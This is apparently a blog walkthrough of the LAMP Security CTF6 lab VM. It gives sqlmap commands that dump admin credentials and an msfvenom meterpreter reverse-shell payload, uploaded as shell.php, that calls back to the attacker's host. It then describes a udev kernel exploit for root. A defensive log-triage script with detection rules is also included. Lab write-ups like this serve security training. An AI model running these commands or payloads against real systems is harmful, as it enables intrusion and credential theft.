April 28, 2019

LAMP Security CTF6 Walkthrough



Hello readers, today we are going to solve LAMP Security CTF6. This is a beginner-level challenge. In this walkthrough we are going to exploit the VM and gain root privileges. Let's begin and get root access.

List of actions
  •  Reconnaissance of the target
  •  Web application enumeration
  •  SQL injection using sqlmap
  •  Web application exploitation using a backdoor
  •  Get restricted shell access to the target
  •  Upload exploit
  •  Gain root privilege

1      Reconnaissance 

First of all we have to discover the target VM using the netdiscover tool in Kali.


The search results reveal our target VM.



Now we know our target VM's IP, so let's scan it with nmap to discover the open ports and the services running on the target. To do so, execute the command below and wait for the result.

nmap -sT -O -p- 172.16.2.93




From the above screenshot we can observe that a web server is running on port 80. So let's open the website and enumerate it for further information.



2      Web application enumeration
The above website is running on port 80. Now let's scan the website using nikto and find out whether any vulnerabilities exist.



The scan results give us some fruitful information. According to the results, directory indexing is enabled on the paths below, which may give us some sensitive information about the web application.

- /files/
- /sql/

Let's enumerate those paths and find out whether they contain any useful information.



From the above screenshot we get to know this directory contains some image files. Later we will see how to upload a backdoor within it.


 
From the above screenshot we can observe that a file named db.sql exists. Let's open the file and see if we can get any login credentials.



From the above screenshot we can see that, partway through the file, the credentials for admin are written in plaintext.
Username = admin
Password = adminpass

3      SQL injection using sqlmap
We can also try to get the credentials with sqlmap. So let's get the admin password using sqlmap as well.

Type the following sqlmap command in the console and hit enter:

sqlmap -o -u "http://172.16.2.93/?action=login" --forms --dbs

From the above command we have got the below databases.











Our target is cms, so let's enumerate the database and find out which tables it contains. To do that, execute the command below.

sqlmap -o -u "http://172.16.2.93/?action=login" --forms -D cms --tables

As a result we get the three results below.










Now get the data inside the user table. To do that, execute the command below.

sqlmap -o -u "http://172.16.2.93/?action=login" --forms -D cms -T user --dump

We have successfully got the admin credentials.







Now that we have the admin credentials, let's try to log in to the application's admin panel.



We have successfully logged in to the admin account.



4      Web application exploitation using backdoor
Now, using the Add Event page, we will try to upload the backdoor and get a shell on the server.
To do that, enter the command below on the Kali machine.

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.2.155 lport=4444 -f raw
After getting the result, copy the code from <?php to die(); and save it on the desktop with the name shell.php



Now let's move to the application and try to upload the shell.php file.



After that, return to the Kali machine, start msfconsole, and execute the commands below to get the meterpreter session.



Now return to the web application and browse to the path below to execute the uploaded file shell.php:

172.16.2.93/files/shell.php



We have successfully got the meterpreter session.
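
Seen from the defender's side, the steps up to this point (the listings under /files/ and /sql/, the download of db.sql, sqlmap against the login form, and a PHP file requested from the upload directory) all leave entries in the Apache access log. The script below is an added example, not part of the original walkthrough; it assumes the Apache "combined" log format, and its sample log lines are constructed.

```python
import re

# Apache "combined" log format is assumed; adjust if LogFormat differs.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
UPLOAD_DIR = "/files/"                 # upload directory from the walkthrough
LISTING_DIRS = {"/files/", "/sql/"}    # paths reported as indexable
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)


def triage(lines):
    """Return (ip, rule, path) tuples for requests worth a closer look."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue                   # not combined format; skip
        ip, path, ua = m["ip"], m["path"], m["ua"]
        bare = path.split("?", 1)[0]   # ignore the query string
        served = m["status"].startswith("2")
        # Matches only the tool's default User-Agent; no hit proves nothing.
        if "sqlmap" in ua.lower():
            findings.append((ip, "sqlmap-user-agent", path))
        # A 2xx on the bare directory means a listing or index page was served.
        if served and bare in LISTING_DIRS:
            findings.append((ip, "directory-listing", path))
        if served and bare.lower().endswith(".sql"):
            findings.append((ip, "sql-dump-download", path))
        # Scripts should never be requested from the upload directory.
        if bare.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(bare):
            findings.append((ip, "script-in-upload-dir", path))
    return findings


# Constructed sample lines (hypothetical, not captured from the VM).
SAMPLE = [
    '172.16.2.155 - - [28/Apr/2019:10:01:02 +0000] "GET /sql/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.16.2.155 - - [28/Apr/2019:10:01:09 +0000] "GET /sql/db.sql HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '172.16.2.155 - - [28/Apr/2019:10:05:40 +0000] "POST /?action=login HTTP/1.1" 200 900 "-" "sqlmap/1.3#stable (http://sqlmap.org)"',
    '172.16.2.155 - - [28/Apr/2019:10:20:11 +0000] "GET /files/shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '172.16.2.10 - - [28/Apr/2019:10:21:00 +0000] "GET /files/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(*finding)
```

The script-in-upload-dir rule is the most reliable of the four: an upload directory that only holds images has no legitimate reason to serve a .php request.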



Now run the ‘sysinfo’ command to get the server's kernel information, so that we can search for an exploit to escalate to root privileges.



As per the above screenshot, the kernel version of the target system is 1.6.18-92. Let's search the internet for an exploit.

After several searches I found the exploit below on Exploit-DB.



Let's download the exploit and upload it to the /tmp directory of the target system.

5      Upload exploit
To do that, follow the steps below.



6      Get restricted shell access to the target
After successfully uploading the file, run the ‘shell’ command, then type the Python script below into the shell and execute it to get restricted access to the target's bash command prompt.



Now go to the /tmp folder and set the permission on the file using the ‘chmod’ command.



7      Gain root privilege
Now run the command below to get the netlink ID, and after that execute the udev.sh file with the ID as its argument.



Congratulations!! We have successfully got root access. Keep one small thing in mind: you might have to execute the shell script more than once to get root access; as you can see, I ran it more than once to be sure the script executed successfully. If you have any further doubts about this, please let me know in the comment section. Thanks for reading my article. Happy hacking!!